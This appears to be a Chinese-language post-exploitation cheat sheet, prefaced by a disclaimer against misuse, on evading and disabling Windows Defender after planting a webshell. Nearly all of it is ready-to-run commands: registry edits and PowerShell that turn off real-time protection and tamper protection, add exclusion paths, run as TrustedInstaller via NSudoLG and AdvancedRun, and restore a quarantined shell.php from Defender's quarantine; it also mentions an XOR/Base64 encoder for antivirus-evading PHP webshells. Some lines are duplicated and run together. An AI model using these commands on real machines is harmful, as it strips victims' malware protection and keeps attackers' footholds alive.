声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
(2)系统补丁信息
PHP_XOR_BASE64
加密器即可免杀(php一句话直接杀),生成 PHP_XOR_BASE64 webshell#查看排除项
reg query 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions' /s
#查看版本
dir 'C:\ProgramData\Microsoft\Windows Defender\Platform\' /od /ad /b
#查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭)
reg query 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features' /v 'TamperProtection'
#需要TrustedInstaller权限
##cmd注册表关闭Windows defender
reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 1 /f
##cmd关闭篡改保护
NSudoLG.exe -U:T cmd /c 'reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features' /v 'TamperProtection' /d 4 /t REG_DWORD /f'
##cmd注册表恢复Windows defender
reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 0 /f
##cmd添加Windows defender排除项
reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /v 'c:\temp' /d 0 /t REG_DWORD /f
#查看排除项Get-MpPreference | select ExclusionPath#关闭Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除项Add-MpPreference -ExclusionPath 'c:\temp'#删除排除项Remove-MpPreference -ExclusionPath 'C:\test'#关闭实时保护Set-MpPreference -DisableRealtimeMonitoring $true
#cmd注册表关闭Windows defender
reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 1 /f
#cmd注册表恢复Windows defender
reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 0 /f
#cmd添加Windows defender排除项
reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /v 'c:\temp' /d 0 /t REG_DWORD /f
#NSudoLG.exe关闭Windows defender
NSudoLG.exe -U:T cmd /c 'reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 1 /f'
#NSudoLG.exe恢复Windows defender
NSudoLG.exe -U:T cmd /c 'reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 0 /f'
#NSudoLG.exe添加Windows defender排除项
NSudoLG.exe -U:T cmd /c 'reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /v 'c:\temp' /d 0 /t REG_DWORD /f'
AdvancedRun.exe /EXEFilename '%windir%\system32\cmd.exe' /CommandLine '/c reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableRealtimeMonitoring' /d 1 /t REG_DWORD /f' /RunAs 8 /Run
StopDefender_x64.exe
#查看排除项Get-MpPreference | select ExclusionPath#关闭Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除项Add-MpPreference -ExclusionPath 'c:\temp'#删除排除项Remove-MpPreference -ExclusionPath 'C:\test'
Set-MpPreference -DisableRealtimeMonitoring $true
C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
#查看版本(查看<antimalware platform version>)dir 'C:\ProgramData\Microsoft\Windows Defender\Platform\' /od /ad /b#验证dir 'C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.6-0\' | findstr MpCmdRun
#查看被隔离的文件列表
MpCmdRun -Restore -ListAll
#恢复指定名称的文件至原目录
MpCmdRun -Restore -FilePath C:\phpstudy_pro\WWW\shell.php
#恢复所有文件至原目录
MpCmdRun -Restore -All
#查看指定路径是否位于排除列表中
MpCmdRun -CheckExclusion -path C:\phpstudy_pro\WWW\
联系客服